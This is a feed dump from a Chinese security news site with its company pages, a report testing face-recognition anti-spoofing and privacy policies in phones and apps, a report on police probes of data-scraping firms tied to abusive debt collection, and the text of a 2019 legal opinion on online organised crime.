安联智库--网络安全新媒体资讯平台 http://seczk.com 信息安全资讯,热点资讯,安全期刊,人物专访,安全事件,漏洞威胁,安全技术,攻防众测, Wed, 23 Oct 2019 22:13:00 +0800 zh-CN hourly 1 https://www.s-cms.cn/?v=4.7.5 加入我们 Wed, 23 Oct 2019 22:13:00 +0800

      欢迎有志从事信息安全的朋友,一起加入安联智库这个大家庭,有你们的到来安联智库将因你而出彩!

]]>
联系我们 Wed, 23 Oct 2019 22:13:00 +0800

安联智库&安联攻防实验室(简称:seczk)www.seczk.com
使命:让安全,更简单!
提出:攻击溯源、纵深防御的安全治理解决方案!
微信 、QQ:110468258
网站:www.seczk.com 
邮箱:110468258#qq.com 
地址:广州市天河区黄埔大道西505号A栋2519室 
机构:[广东-广西-海南-云南-贵州-四川-福建-江西-湖南-北京-深圳-重庆-上海.....] 


]]>
团队简介 Wed, 23 Oct 2019 22:13:00 +0800

    安联智库是为了(简称:seczk)是一个专注于信息安全、具有全面信息安全综合服务能力的专业服务团队。seczk立足自主研发,专注信息安全市场,为客户提供安全产品、安全服务、安全集成、安全培训等多项综合性信息安全服务。经过多年的发展已经成为一个理念先进、方案成熟、团队精干、客户认可的具有本土化特色的信息安全服务商。
    seczk立足于羊城广州,目前拥有一支20多人的专业队伍,团队拥有多名CISP、CISSP、CCIE、PMP等技术人员,核心团队成员都出自国内著名安全厂商与安全服务测评机构(如启明星辰、绿盟、天融信、蓝盾、竟远、南方信息安全研究院、中国信息安全测评中心等),积累了丰富的安全经验,其技术能力已获得过不同行业客户的认可。
    安联智库&安联攻防实验室(简称:seczk)使命:让安全,更简单!提出攻防纵深防御、攻击溯源的安全治理解决方案!




]]>
人脸识别场景实测:照片视频无法骗过识别 部分隐私政策有漏洞 Wed, 23 Oct 2019 22:13:00 +0800 人脸识别技术正在越来越多的场景得到应用:多款手机推出人脸解锁功能;支付宝、微信先后推出刷脸支付设备并对外推广;部分写字楼、小区引入人脸识别门禁系统;广州地铁APM线近日也正式启用刷脸过闸设备……但也有不少人对人脸识别技术的安全性和隐私泄露风险提出质疑。近期引发广泛关注的AI换脸APP“ZAO”就因为隐私政策不完善、存在安全风险而被要求整改。

为了解目前人脸识别技术的应用情况和安全性,南都民调中心近日抽选了5款手机品牌、10款常用APP和2处门禁系统,对其人脸识别功能的识别方式、数据存储以及隐私政策等方面进行实际测试。结果发现,部分APP并未向用户提供删除人脸数据的途径;还有部分APP隐私政策不完善,用户使用相关服务存在一定的隐私泄露风险。南都民调中心同时发起的网络调查结果也显示,超过九成受访者担心人脸信息会在不知情的情况下被滥用,希望有关部门制定相关法律法规,完善公民生物识别数据的监管。

手机测评:小米华为未将面部数据列入隐私政策内

测评员共对5款带有人脸解锁功能的智能手机进行了实际测试。在本次测试中,测评员尝试使用提前拍摄的照片或视频解开手机锁屏,5款被测手机均提醒未检测到人脸,无法解锁。但测评员发现部分手机品牌的隐私政策并未将人脸数据列为用户个人信息,对相关数据的去向也未有明确告知。

苹果自iPhone X开始使用原深感摄像头系统为用户提供人脸识别解锁以及手机支付授权。在实际测试中,苹果手机仅提供5次的人脸识别尝试机会,如果连续5次识别均未能成功解开手机锁屏,则会要求使用者输入密码,降低手机锁屏被恶意破解的可能性。虽然本次测试中照片和视频未能解开苹果的人脸识别,但自苹果推出该项服务以来,国内外都曾报道过有双胞胎或外貌相似的两人可解锁对方手机。其面容ID的安全性似乎仍有提升空间。

而在苹果的面容ID隐私说明中,苹果则承诺会对用户的面部特征数据作加密处理,并且只保存在设备的本地空间内,不会共享给第三方。

另外4款测评手机的品牌分别是华为、小米、锤子科技和摩托罗拉。由于这几款手机都只是采用普通的前置摄像头完成人脸识别,所以设置页面中都有对用户作出提示:人脸识别的安全性较指纹识别及密码低,有可能被他人利用照片等方式骗过识别系统,解锁手机。但在本次测试中,测评员多次尝试都未能使用照片或视频通过这几款手机的人脸识别。

值得注意的是,在《华为消费者业务隐私声明》和《小米隐私政策》中,测评员均未能找到关于人脸数据采集的说明条款。华为手机仅在开通人脸解锁功能时展示一份《免责声明》,表示相关数据仅存储在设备的本地空间内;而小米手机则仅展示一段简单的风险提示,说明人脸识别的安全性较低,但并未提及人脸数据的去向。

相较之下,锤子科技和摩托罗拉的隐私政策内均有提及人脸数据的采集。其中,摩托罗拉更明确告知相机、相册等部分应用也会使用脸部检测功能,但其相关数据仅保留在手机中,不会上传给摩托罗拉或其他第三方。

支付宝、京东可用刷脸登录和刷脸支付

测评员本次共对10款提供人脸识别服务的手机APP进行了测评。同样地,这些APP都拒绝使用提前拍摄的照片或视频来完成人脸识别验证。测评员在测试过程中还发现,目前不少APP会选择使用身份证件照片作为人脸识别的比对基准,确保用户身份的真实性。也有部分企业在隐私政策中承诺建立信息安全部门,保障用户信息安全。

其中,支付宝目前允许用户使用人脸识别方式进行账户登录、刷脸支付等操作。在测评员实际测试过程中,支付宝的人脸识别速度非常快,没有要求用户作出眨眼、摇头、读数等动作来配合活体识别,一瞬间就完成了识别验证。

作为国民级的支付工具,支付宝在隐私政策中承诺在内部建立个人信息保护责任部门以及相关内控制度,保障用户的个人信息安全。

但值得注意的是,测评员查阅支付宝的隐私政策以及自助客服说明后,发现目前支付宝并不允许用户自行变更身份实名认证,相关人脸数据也不允许进行修改。也就是说,虽然人脸识别服务可以由用户自行选择是否开启,但当用户初次绑定个人身份信息,并录入人脸数据后,除非彻底注销支付宝账号,否则相关资料将一直保留且无法修改。

同样地,京东APP内也提供刷脸登录和刷脸支付服务,但两项功能有单独的入口和数据上传方式。其中,刷脸登录需要用户使用手机摄像头拍摄人脸数据。在测评员实际测试过程中,如果尝试使用提前录制的视频来登录,APP会识别到视频画面中的眨眼动作,但随后仍会拒绝登录请求,似乎是APP的活体识别机制发挥了作用。而在刷脸支付功能中,用户则可以选择直接使用手机自拍,或上传手机相册中的照片提供人脸数据,而且,用户还可以随时在APP中更换作为人脸比对基准的照片。

而在京东的隐私政策中,测评员看到,京东也承诺建立信息安全委员会,由专人负责个人信息安全事务,并定期举办相关培训课程,加强员工对保护个人信息重要性的认识。此外,京东还承诺,用户的个人信息仅保存至账号注销之日后的一个月。

银行类应用:微众银行人脸识别标准十分严格

本次测评的APP中,包括微众银行、中国工商银行、招商银行3款银行类应用。3家银行的人脸识别应用场景均有所区别。

其中,微众银行APP在开设账户或绑定其它银行账户时,需要用户进行人脸识别完成身份验证。该APP的人脸识别标准十分严格,用户需要在APP内采用屏幕反光进行识别,然后把录制下来的视频上传,进行审核。测评员在第一次识别的过程中还由于角度及光线问题被告知审核失败。如果尝试使用照片或视频进行识别,APP更会停留在头像识别的步骤,无法开始下一步的视频录制。

而在中国工商银行(工银融e行)中,云保管和设备保护两项功能均涉及人脸识别认证。在实际测试中,用户需要正对手机屏幕并眨眼完成活体识别,照片及视频均无法通过该识别环节。由于银行业务的特殊性,其只能通过注销电子银行账户的方式删除用户的所有个人信息。

招商银行APP则允许用户自行开通刷脸支付功能。测评员在使用过程中发现,开通这一功能只需输入支付密码,APP并未重新录入用户人脸数据。但用户可以点击上传辅助验证照片,再次拍摄一张个人照片,以免证件照比对不通过,影响支付体验。值得注意的是,在招商银行的刷脸支付协议中,测评员并未看到银行对人脸数据的使用范围、共享范围以及存储方式作出承诺。虽然用户可以自行关闭刷脸支付功能,但APP中并未提及会否一并删除用户自行上传的辅助验证照片。

广州地铁官方APP未发现人脸数据删除方式

目前,广州地铁已在APM线广州塔站正式启用刷脸过闸设备。市民如果想体验刷脸过闸,需要提前在广州地铁官方APP中录入人脸数据。测评员在实际操作过程中发现,用户在开通刷脸过闸功能前,需要先登录APP账户,并且通过微警认证模块完成相关的实名认证以及活体认证。身份识别通过后,app还会要求用户提供一张个人正面头像照作为刷脸过闸的比对基准照片。

但在广州地铁的《人脸业务开通服务协议》中,仅提及广州地铁会按照公安部规范获取相关资料,而未提及用户提交的个人照片会存储于何处以及有何数据保护措施。而且,测评员在APP内也找不到自行删除相关人脸数据以及关闭该服务的方式。

百度APP未说明人脸数据会否删除

百度APP目前为用户提供刷脸登录的功能。但测评员在百度的隐私政策等协议中均未找到与人脸数据相关的说明条款,只在APP的登录设置中看到了一段简单的《刷脸登录规则说明》,提醒用户的人脸数据可能会提交给法律法规允许或政府机关授权的机构进行比对核验。

在实际测试过程中,测评员尝试使用照片和视频进行登录,都被APP拒绝了请求。虽然在关闭刷脸登录后,需要再次录入面部数据方可重新使用这一功能,但整个过程中都未说明关闭刷脸登录是否意味着此前提交的人脸数据一并作删除处理。

小区门禁系统:照片存储在管家电脑内

在广州大道中某写字楼,人脸识别技术已经应用在了门禁系统上。员工需要提交个人照片作为识别系统的比对基准照片。在实际测试过程中,测评员使用其中一位男员工的照片顺利通过了该写字楼的门禁系统,但当再尝试使用其他员工的照片时,门禁系统却又能正确判断出该照片并非真人。尽管不是任意照片都能通过人脸识别,但已经说明该系统存在一定的安全漏洞。

而在番禺的某大型住宅小区,同样采用了人脸识别作为小区的门禁系统。该识别系统的比对基准照片也是由业主提交给小区的片区管家或管家助理。测评员使用其中一名业主的照片尝试通过识别,多次测试均被门禁系统拒绝。此外,测评员还了解到,该小区物管采集到的业主照片,会存储在负责该片区的管家电脑中,作简单的加密处理。

网络调查:近九成受访者用过人脸识别

近日,南都民调中心就人脸识别技术话题联合“热点站站队”平台发起网络调查,在一周之内共收到3052位网友的投票。结果显示,79.7%的受访者对人脸识别技术有一定的了解,仅20.3%的受访者不清楚人脸识别技术。

进一步问及人脸识别技术的使用情况时,仅10.1%的受访者未使用过人脸识别技术,而手机解锁(55.7%)、申请办理证件(49.4%)和门禁系统(43%)则是最常使用人脸识别技术的场合。由此可见,目前人脸识别技术已逐渐渗透到市民的日常生活中。

九成受访者担忧人脸识别安全隐患

尽管人脸识别技术的应用已经十分普遍,但依然有不少受访者表示对该技术并不放心。本次调查中,有41.8%的受访者表示非常担心人脸识别技术存在安全隐患,有55.7%表示有一定担心但可以多加防范,完全不担心的仅占2.5%。

而问及对人脸识别技术的使用存在哪些担忧时,受访者最担心的3种情况是“人脸信息会在不知情的情况下被滥用”“犯罪分子利用该技术制造违反法律和道德的软件”和“人脸信息被非法贩卖”,分别占93.7%,86.1%和83.5%。

受访者呼吁完善公民生物识别数据监管

面对上述担忧,有92.4%的受访者希望有关部门制定相关法律法规,完善公民生物识别数据的监管;而希望“有关服务平台提升技术甄别手段,防止人脸信息被盗用”“限制人脸识别技术的使用主体和使用范围”“使用该技术的机构或企业必须与用户签订使用协议”的受访者分别占81%,79.7%和75.9%。

完善相关数据监管,让大家放心刷脸

从本次的测试结果来看,虽然有门禁系统凭照片便通过了识别,但也并非任意照片都能顺利通过,依靠偷拍、网上抓取等渠道获取的照片视频骗过人脸识别系统的可能性较低。人脸识别相关技术已经较为成熟。但部分服务平台在使用人脸识别技术时,并未对人脸数据保护作出明确承诺,甚至连数据的去向都未能说明,则难免令用户产生担忧。

毫无疑问,人脸识别技术的普及方便了不少市民的日常生活,其市场潜力十分巨大。但在人脸识别技术逐渐走向成熟,应用场景越来越多的同时,有关的行业标准、隐私保护政策也应尽快出台。保护用户隐私不仅需要靠相关企业和机构的自律,更需要在有关部门的引导下建立起整个行业的统一规范,共同筑起保护用户隐私的防火墙。

9999.jpg

]]>
爬虫整顿风暴冲击波持续 杭州大数据服务商接连被查 Wed, 23 Oct 2019 22:13:00 +0800 这波针对爬虫业务的强监管是由于公安部门打击“套路贷”牵扯出了导流获客和暴力催收这两个帮凶,发现爬虫是主要工具,为这些“套路贷”平台爬取通讯录、地址定位等个人敏感信息,从而引发了命案及相关刑事调查。

爬虫,应用与边界

网络爬虫,是一种按照一定规则,自动抓取互联网信息的程序与技术。如果通过爬虫抓取网络公开信息,并不违法;但如果抓取的是未公开、未授权的个人敏感信息,就属于违法行为,违反的是2017年6月1日实施的《网络安全法》以及“两高”相关司法解释。

51信用卡事件在杭州警方发声明之前,多方都认为是因为爬虫技术使用不当触及红线导致,由此,爬虫技术也被拉到了公众关注的焦点。21世纪经济报道记者了解到,其实,外界的这种猜想也是无风不起浪,爬虫整肃风暴缘何刮到杭州并卷起风暴?

今年以来,大数据风控行业颇不平静,9月份以来,杭州的魔蝎科技和公信宝运营公司、杭州存信数据科技有限公司(以下简称“杭州存信”)以及贷款超市头部机构“信用管家”先后被杭州警方调查。

此外,还有多家大数据风控公司人士“协助调查”,涉及同盾科技等多家机构。一时风声鹤唳,大数据行业的从业者人人自危。多家大数据公司表态暂停爬虫业务。

21世纪经济报道记者多方了解到,上述公司受调查均是与爬虫业务有关。

对此,同盾科技相关人士22日回复21世纪经济报道记者称,数聚魔盒产品是信川的产品之一,因为该服务对适用条件与场景有严格的授权要求与限制,为了更加严格的保护用户合法权益,避免个人信息被误用,同盾已经从去年开始逐步调整业务,目前已全部停止相关服务。除此之外,同盾的高管并没有接受警方调查,同时,同盾主营业务也没受到影响,没有相关调整。

爬虫“鼻祖”被查

10月21日上午,51信用卡位于杭州西湖区紫霞街80号西溪谷国际商务中心的办公地点遭遇杭州警方突击调查。引来业内一片哗然。

而51信用卡正是行业内最早开展爬虫的公司之一,这让不少业内人士猜测此次被警方调查即是利用爬虫技术非法获取用户个人信息,而这是近期公安部严厉打击的范畴。

51信用卡堪称业内爬虫行业的鼻祖,此次杭州被调查的数据公司魔蝎科技创始人周江翔是51信用卡的前高管。魔蝎科技是业内知名的大数据服务公司,合作机构范围较广,牵涉业内大量金融机构。

但杭州公安10月21日深夜发布的最新通报显示,51信用卡被调查的原因是其委托的外包催收机构涉嫌非法催收,涉嫌寻衅滋事等犯罪行为。

就在51在杭州被大批警察包围突击调查的同一天,10月21日,最高人民法院、最高人民检察院、公安部、司法部联合发布《关于办理非法放贷刑事案件若干问题的意见》。《意见》将打击目标锁定社会危害性最为突出的非法高利放贷,明确在定罪量刑时以单次实际年利率超过36%的非法放贷为基准。规定即日生效施行。

同日,《关于办理利用信息网络实施黑恶势力犯罪刑事案件若干问题的意见》也正式发布,公安部副部长、全国扫黑办副主任杜航伟在新闻发布会中表示,《意见》首先明确,通过线上方式实施黑恶势力犯罪的主要手段是“发布、删除负面或虚假信息,发送侮辱性信息、图片,以及利用信息、电话骚扰等方式,威胁、要挟、恐吓、滋扰他人”,同时对利用信息网络实施的强迫交易罪、敲诈勒索罪、寻衅滋事罪如何认定以及此类案件的特殊取证方式等问题,作了明确规定。

“刀怎么用才是问题”

所谓网络爬虫,是一种按照一定规则,自动抓取互联网信息的程序与技术。如果通过爬虫抓取网络公开信息,并不违法;但如果抓取的是未公开、未授权的个人敏感信息,就属于违法行为,违反的是2017年6月1日实施的《网络安全法》以及“两高”相关司法解释。

爬虫技术的数据主要分为司法信息、电商信息、银行卡信息、运营商信息、社交信息、开放数据等几大类。在这些数据维度中,比较受欢迎的都是覆盖度高、标准化较强的通用类数据,比如身份验证、逾期黑名单信息等,一般是通过爬取淘宝、社交网络、网上银行等获取数据。

21世纪经济报道记者了解到,这波针对爬虫业务的强监管是由于公安部门打击“套路贷”牵扯出了导流获客和暴力催收这两个帮凶,发现爬虫是主要工具,为这些“套路贷”平台爬取通讯录、地址定位等个人敏感信息,从而引发了命案及相关刑事调查。

2017年6月1日,《网络安全法》正式施行,其中第四十一条规定,网络运营者收集、使用个人信息,应当遵循合法、正当、必要的原则,公开收集、使用规则,明示收集、使用信息的目的、方式和范围,并经被收集者同意;第四十四条规定,任何个人和组织不得窃取或者以其他非法方式获取个人信息,不得非法出售或者非法向他人提供个人信息。

一家杭州的大数据风控公司相关负责人对21世纪经济报道记者表示,“目前观测到的市场的一些动向和监管的尺度,更多是在于爬虫技术的非法使用。不注重个人隐私保护,泄露信息,甚至贩卖信息给涉黑暴力催收。所以卖刀没问题,刀怎么用才是问题。”

他认为,经过整肃之后存活的数据公司数量会大幅减少,同时对于数据使用的规范要求会更严格,这会让绝大部分的金融科技公司都或多或少受到冲击,因为大数据是整个金融科技行业的基础设施。

判断爬虫行为合法性, robot协议不可或缺

在最近的态势下,大数据行业如今面临强监管。

一位从业人员对此表示,公民个人信息是绝对不敢爬了,那么网上的公开非敏感个人信息能否收集,怎样的爬虫行为是合法的?

对此,中国银行法学研究会理事肖飒10月22日对21世纪经济报道记者表示,判断爬虫行为是否具有合法性,robot协议不可或缺。存在已有25年的robot协议是互联网搜索引擎与网页持有者之间达成的“行业规范”,该协议会告知网站的“访问权限”,如果设置了robot协议,大数据公司还要突破访问权限,那么就具有明显的主观恶性。

互联网行业里谷歌、百度、搜狗、ebay等,均设有该协议,这几乎是每一个互联网人都知道的常识,如果公司不想被爬取信息,只需要很轻松地安放robot协议表明不愿意被爬取和收录就可以了。

“也就是说,如果没有robot,应该就可以理解为可以合法爬取的公开信息。”肖飒称。

但是近期的案例有明显从严的趋势。以某直辖市某区判决一场刑事官司为例,被告人张某、宋某、侯某共谋用技术手段(爬虫)在某网站抓取视频,放入自己所在公司网站上,造成被害公司人民币2万元的经济损失。2017年9月提起公诉,后三人被判非法获取计算机信息系统数据罪,各自领刑。

同盾科技CEO蒋韬曾在对外发布的公开信《心存敬畏向善而行》中表示,人工智能及大数据的发展中的数据及隐私保护是一个世界级难题,需要监管、企业、法律界等共同研究和探讨。


爬虫技术罪与罚:失衡的催收应用边界

“爬虫技术是一项工具,但被居心不良的人使用,就可能出现大问题。”一位互联网消费金融平台风控总监感慨说。

尽管近日51信用卡被查主要源自其委托的催收公司存在冒用国家工作人员暴力催收行为,但在多位业内人士看来,这种暴力催收行为离不开爬虫技术的“配合”。

“比如有些互联网消费金融平台通过爬虫技术能时时掌握借款人行踪与地址定位(未必获得用户允许),然后将此信息转交给催收公司,由后者上门轮番暴力催收,无论借款人跑到哪里,暴力催收就如影随影,如此部分借款人心态崩溃,容易走上不归路。”这位互联网消费金融平台风控总监透露,此外有些平台在未获得用户授权的情况下,通过爬虫技术掌握借款人与亲朋好友的通话记录,由此向这些亲朋好友施压督促他还款,导致借款人感到脸面丢失,也容易走上不归路。

他坦言,这背后,与某些平台通过爬虫技术过度收集并贩卖借款人隐私信息息息相关。

多数情况下,借款人看到的授权协议仅仅显示平台将通过后者授权的账号,只能登陆相关网站邮箱与手机桌面查看所下载的APP。但事实上,这些平台的爬虫技术早已突破授权协议使用范畴,开始抓取借款人在网站邮箱与手机桌面的大量各类数据,其中不少涉及用户极其隐私的个人信息“另有他用”。比如他们会将借款人地址定位信息“交给”催收公司进行催收回款,或将借款人其他隐私信息卖给其他平台作为信贷风控决策依据等。

“在欧美国家,这种行为肯定是触犯法律的。”一位曾在美国开发爬虫技术的金融机构技术总监向21世纪经济报道记者透露。

记者多方了解到,目前中国对用户隐私信息保护的相关法律正在加速完善,比如正在征求意见的《个人金融信息(数据)保护试行办法》规定,(金融机构)不得非法从从事个人征信业务活动的第三方获取个人金融信息,以及金融机构不得以“概括授权”的方式取得信息主体对收集、处理、使用和对外提供其个人金融信息的同意。

被玩坏的爬虫技术

上述金融机构技术总监直言,爬虫技术在欧美国家金融领域的使用相当普遍,比如在洗钱监管方面,不少金融科技公司通过爬虫技术抓取各类公开信息,以此完善涉嫌洗钱者的名单以及其人际关系网,从而不放过任何一个漏网之鱼。

“在中国,爬虫技术显然被玩坏了。”他透露,相比欧美国家金融机构通过爬虫技术只能抓取公开信息或经用户授权的个人信息,中国不少P2P平台都存在利用爬虫技术过度收集用户隐私信息行为。具体而言,比如用户授权P2P平台只能访问他浏览过的网站页面或邮箱里涉及信用卡账单的邮件,手机桌面APP下载软件等信息,但在实际操作环节,这些P2P平台利用爬虫技术抓取用户在这些网站的消费行为,私人邮件内容,还有个人行踪及地址定位等隐私信息。

这也是引发暴力催收事件频发的主要原因之一。比如P2P平台将用户地址定位“交给”催收公司,由后者不断上门轮番对借款人进行暴力催收加快回款速度,而部分借款人发现自己走到哪里都被暴力催收,最终心态崩溃并走上不归路。

此外,很多P2P平台还通过用户“授权”,通过爬虫技术抓取用户在银行的大量个人信息,包括个人以往借贷还款记录,职业、婚姻状况等数据,并将这些数据与用户提交给平台的个人数据进行交叉验证,以此判断用户真实的还款能力与还款意愿。但事实上,这种用户“授权”所抓取的内容,是银行需保护的用户隐私信息。

这也引发不少银行与P2P平台的纠葛。近日市场传闻一家银行向51信用卡发函,直指后者通过爬虫技术对银行用户信息进行全方位大量抓取。由于银行未与51信用卡签订相关授权书——允许后者从银行系统获取用户个人信息,因此银行认为51信用卡此举构成侵犯公民个人信息罪,要求后者停止这种抓取用户个人信息行为。

监管加强保护个人隐私

面对爬虫技术过度收集贩卖个人隐私信息所造成的社会问题,欧美国家相关部门一直在加强从严监管力度。

去年5月,欧盟出台了《通用数据保护条例》(简称GDPR)。这份法案的最大杀伤力,是过去互联网机构习以为常的、利用爬虫技术过度抓取用户行为数据的做法,因涉嫌侵犯隐私变得不再“合法”。

它之所以被称为史上最严的数据保护法案,主要在于两点,一是任何企业只要在欧盟市场提供商品或服务,或收集欧盟公民的个人数据,都将受到这部法案的管辖。比如中国跨境电商平台提供“面向欧洲的特惠产品”“欧洲区包邮”等采购服务,或在商品价格上标注欧元价格,就可以被视为在欧盟市场提供商品或服务,将受到GDPR的管辖;二是GDPR法案规定跨境电商等网站经营者不得擅自将用户姓名、银行账户、IP地址等个人信息用于其他业务用途,反之这些网站经营者若要将用户信息用于其他业务用途,需与用户重新签订一份授权协议并明确标注新的用途。

这导致不少跨境电商等互联网平台抱怨客户服务体验大幅下降。因此它们一直尝试游说欧洲相关部门能适度放宽GDPR对个人信息获取使用的监管要求,但鉴于对用户隐私信息的从严有效保护,欧洲相关部门没有松口。

美国奥斯顿律师事务所(alston&bird llp)合伙人kenneth g.weigel此前接受本报记者采访时表示,美国法律则主要从“未经授权故意访问”“超过授权访问权限””从任何受保护的计算机获取信息”三大维度判断爬虫技术公司是否过度收集使用用户个人隐私信息。按照《1986年计算机欺诈与滥用法》,只要爬虫技术公司在抓取用户个人隐私数据时存在上述三种状况,基本都被判定败诉与巨额赔款。

值得注意的是,近年中国在保护个人隐私信息方面的法律日益完善。早在2017年5月8日,最高法院、最高检察院出台了《关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》,对爬虫技术过度收取滥用个人隐私数据做出严格入罪规定。

正在征求意见的《个人金融信息(数据)保护试行办法则规定金融机构不得非法从从事个人征信业务活动的第三方获取个人金融信息,以及不得以“概括授权”的方式取得信息主体对收集、处理、使用和对外提供其个人金融信息的同意。

“在2017年《关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》出台后,相关部门曾抓了一些利用爬虫技术过度收集滥用个人隐私数据的P2P平台技术人员,但由于当时处罚力度不够重,并未引发很多大数据风控机构与P2P平台高层重视,如今多家爬虫技术公司被查与相关高层被抓,足以凸显相关部门正采取雷霆手段整治爬虫技术过度收集滥用个人隐私数据行为,从而净化个人隐私信息保护领域。”上述平台技术总监指出,经此一番行业动荡,利用爬虫技术过度收集个人隐私信息牟利的公司未来生存空间也被大幅压缩,目前很多银行与持牌金融机构已经暂停与这类机构的各类大数据风控技术合作。

9999.jpg

]]>
两高两部《关于办理利用信息网络实施黑恶势力犯罪刑事案件若干问题的意见》全文 Wed, 23 Oct 2019 22:13:00 +0800 最高人民法院 最高人民检察院 公安部 司法部关于印发《关于办理利用信息网络实施黑恶势力犯罪刑事案件若干问题的意见》的通知

各省、自治区、直辖市高级人民法院、人民检察院、公安厅(局)、司法厅(局),解放军军事法院、军事检察院,新疆维吾尔自治区高级人民法院生产建设兵团分院、新疆生产建设兵团人民检察院、公安局、司法局:

为认真贯彻落实中央开展扫黑除恶专项斗争的部署要求,正确理解和适用最高人民法院、最高人民检察院、公安部、司法部《关于办理黑恶势力犯罪案件若干问题的指导意见》,最高人民法院、最高人民检察院、公安部、司法部研究制定了《关于办理利用信息网络实施黑恶势力犯罪刑事案件若干问题的意见》。现印发给你们,请认真贯彻执行。

最高人民法院 最高人民检察院 公安部 司法部

2019年7月23日

最高人民法院 最高人民检察院 公安部 司法部关于办理利用信息网络实施黑恶势力犯罪刑事案件若干问题的意见

为认真贯彻中央关于开展扫黑除恶专项斗争的部署要求,正确理解和适用最高人民法院、最高人民检察院、公安部、司法部《关于办理黑恶势力犯罪案件若干问题的指导意见》(法发〔2018〕1号,以下简称《指导意见》),根据刑法、刑事诉讼法、网络安全法及有关司法解释、规范性文件的规定,现对办理利用信息网络实施黑恶势力犯罪案件若干问题提出以下意见:

一、总体要求

1. 各级人民法院、人民检察院、公安机关及司法行政机关应当统一执法思想、提高执法效能,坚持“打早打小”,坚决依法严厉惩处利用信息网络实施的黑恶势力犯罪,有效维护网络安全和经济、社会生活秩序。

2. 各级人民法院、人民检察院、公安机关及司法行政机关应当正确运用法律,严格依法办案,坚持“打准打实”,认真贯彻落实宽严相济刑事政策,切实做到宽严有据、罚当其罪,实现政治效果、法律效果和社会效果的统一。

3. 各级人民法院、人民检察院、公安机关及司法行政机关应当分工负责,互相配合、互相制约,切实加强与相关行政管理部门的协作,健全完善风险防控机制,积极营造线上线下社会综合治理新格局。

二、依法严惩利用信息网络实施的黑恶势力犯罪

4. 对通过发布、删除负面或虚假信息,发送侮辱性信息、图片,以及利用信息、电话骚扰等方式,威胁、要挟、恐吓、滋扰他人,实施黑恶势力违法犯罪的,应当准确认定,依法严惩。

5. 利用信息网络威胁他人,强迫交易,情节严重的,依照刑法第二百二十六条的规定,以强迫交易罪定罪处罚。

6. 利用信息网络威胁、要挟他人,索取公私财物,数额较大,或者多次实施上述行为的,依照刑法第二百七十四条的规定,以敲诈勒索罪定罪处罚。

7. 利用信息网络辱骂、恐吓他人,情节恶劣,破坏社会秩序的,依照刑法第二百九十三条第一款第二项的规定,以寻衅滋事罪定罪处罚。

编造虚假信息,或者明知是编造的虚假信息,在信息网络上散布,或者组织、指使人员在信息网络上散布,起哄闹事,造成公共秩序严重混乱的,依照刑法第二百九十三条第一款第四项的规定,以寻衅滋事罪定罪处罚。

8. 侦办利用信息网络实施的强迫交易、敲诈勒索等非法敛财类案件,确因被害人人数众多等客观条件的限制,无法逐一收集被害人陈述的,可以结合已收集的被害人陈述,以及经查证属实的银行账户交易记录、第三方支付结算账户交易记录、通话记录、电子数据等证据,综合认定被害人人数以及涉案资金数额等。

三、准确认定利用信息网络实施犯罪的黑恶势力

9. 利用信息网络实施违法犯罪活动,符合刑法、《指导意见》以及最高人民法院、最高人民检察院、公安部、司法部《关于办理恶势力刑事案件若干问题的意见》等规定的恶势力、恶势力犯罪集团、黑社会性质组织特征和认定标准的,应当依法认定为恶势力、恶势力犯罪集团、黑社会性质组织。

认定利用信息网络实施违法犯罪活动的黑社会性质组织时,应当依照刑法第二百九十四条第五款规定的“四个特征”进行综合审查判断,分析“四个特征”相互间的内在联系,根据在网络空间和现实社会中实施违法犯罪活动对公民人身、财产、民主权利和经济、社会生活秩序所造成的危害,准确评价,依法予以认定。

10. 认定利用信息网络实施违法犯罪的黑恶势力组织特征,要从违法犯罪的起因、目的,以及组织、策划、指挥、参与人员是否相对固定,组织形成后是否持续进行犯罪活动、是否有明确的职责分工、行为规范、利益分配机制等方面综合判断。利用信息网络实施违法犯罪的黑恶势力组织成员之间一般通过即时通讯工具、通讯群组、电子邮件、网盘等信息网络方式联络,对部分组织成员通过信息网络方式联络实施黑恶势力违法犯罪活动,即使相互未见面、彼此不熟识,不影响对组织特征的认定。

11. 利用信息网络有组织地通过实施违法犯罪活动或者其他手段获取一定数量的经济利益,用于违法犯罪活动或者支持该组织生存、发展的,应当认定为符合刑法第二百九十四条第五款第二项规定的黑社会性质组织经济特征。

12. 通过线上线下相结合的方式,有组织地多次利用信息网络实施违法犯罪活动,侵犯不特定多人的人身权利、民主权利、财产权利,破坏经济秩序、社会秩序的,应当认定为符合刑法第二百九十四条第五款第三项规定的黑社会性质组织行为特征。单纯通过线上方式实施的违法犯罪活动,且不具有为非作恶、欺压残害群众特征的,一般不应作为黑社会性质组织行为特征的认定依据。

13. 对利用信息网络实施黑恶势力犯罪非法控制和影响的“一定区域或者行业”,应当结合危害行为发生地或者危害行业的相对集中程度,以及犯罪嫌疑人、被告人在网络空间和现实社会中的控制和影响程度综合判断。虽然危害行为发生地、危害的行业比较分散,但涉案犯罪组织利用信息网络多次实施强迫交易、寻衅滋事、敲诈勒索等违法犯罪活动,在网络空间和现实社会造成重大影响,严重破坏经济、社会生活秩序的,应当认定为“在一定区域或者行业内,形成非法控制或者重大影响”。

四、利用信息网络实施黑恶势力犯罪案件管辖

14. 利用信息网络实施的黑恶势力犯罪案件管辖依照《关于办理黑社会性质组织犯罪案件若干问题的规定》和《关于办理网络犯罪案件适用刑事诉讼程序若干问题的意见》的有关规定确定,坚持以犯罪地管辖为主、被告人居住地管辖为辅的原则。

15. 公安机关可以依法对利用信息网络实施的黑恶势力犯罪相关案件并案侦查或者指定下级公安机关管辖,并案侦查或者由上级公安机关指定管辖的公安机关应当全面调查收集能够证明黑恶势力犯罪事实的证据,各涉案地公安机关应当积极配合。并案侦查或者由上级公安机关指定管辖的案件,需要提请批准逮捕、移送审查起诉、提起公诉的,由立案侦查的公安机关所在地的人民检察院、人民法院受理。

16. 人民检察院对于公安机关提请批准逮捕、移送审查起诉的利用信息网络实施的黑恶势力犯罪案件,人民法院对于已进入审判程序的利用信息网络实施的黑恶势力犯罪案件,被告人及其辩护人提出的管辖异议成立,或者办案单位发现没有管辖权的,受案人民检察院、人民法院经审查,可以依法报请与有管辖权的人民检察院、人民法院共同的上级人民检察院、人民法院指定管辖,不再自行移交。对于在审查批准逮捕阶段,上级检察机关已经指定管辖的案件,审查起诉工作由同一人民检察院受理。人民检察院、人民法院认为应当分案起诉、审理的,可以依法分案处理。

